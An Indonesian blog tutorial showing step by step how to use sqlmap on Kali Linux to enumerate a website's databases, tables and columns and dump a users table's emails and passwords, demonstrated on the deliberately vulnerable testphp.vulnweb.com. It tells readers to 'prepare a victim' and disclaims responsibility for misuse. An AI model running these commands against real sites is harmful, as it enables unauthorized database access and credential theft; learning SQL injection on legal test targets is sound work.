scaning website dengan menggunakan SqlMap di Kali Linux 2.0

pagi bro, pada kesempatan hari ini saya akan membagikan tutorial scaning website dengan menggunakan SqlMap di Kali Linux 2.0 .



langsung saja bro, tanpa basa-basi.

pertama anda siapkan korban dahulu, setelah siap mari ikuti langkah-langkah berikut ini :

buka terminal anda, setelah terbuka ketikkan perintah
sqlmap -h


untuk melakukan perintah hacking masukkan perintah
sqlmap -u (www.target.com) --dbs

contoh :
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs


NOTE : JIKA MUNCUL PESAN-PESAN SILAHKAN TEKAN 'y'

di sini saya mendapatkan 2 data base 
*) acuart
*) information_schema



setelah itu lanjutkan lagi untuk melihat database . ketikkan perintah 
sqlmap -u (www.target.com) -D database-target --tables

contoh
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart  --tables


disini saya menemukan  8 tables acuart

+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+



setelah itu ketikkan perintah
sqlmap -u (www.target.com) -D database-target --columns

contoh
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --columns



hasil scan saya mendapatkan database berikut


setelah itu ketikkan perintah
sqlmap -u (www.target.com) -D (database target) -T (admin) --dump

contoh
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump


dan inilah hasil scan saya


dan pasword adalah tes. email adalah email@email.com ?? oke, tetapi dalam pentesting web sendiri, anda bisa data lebih sensitif.
mungkin ini kurang jelas tetang hasil saya, anda bisa kembangkan sendiri site anda. ini hanya contoh belaka.

sekian dari saya, semoga bermanfaat.

Terimakasih.

NOTE : SAYA TIDAK BERTANGGUNA JAWAB ATAS APA YANG DI LAKUKAN OLEH USER


    PERINGATAN

Jika ingin membagikan artikel ini melalui blog anda, silakan tulis ulang dengan narasi sendiri.
Jangan asal copy paste artikel ini, semua konten di sini telah dilindungi DMCA.com Protection Status

Share this

Related Posts

Previous
Next Post »

2 komentar

Write komentar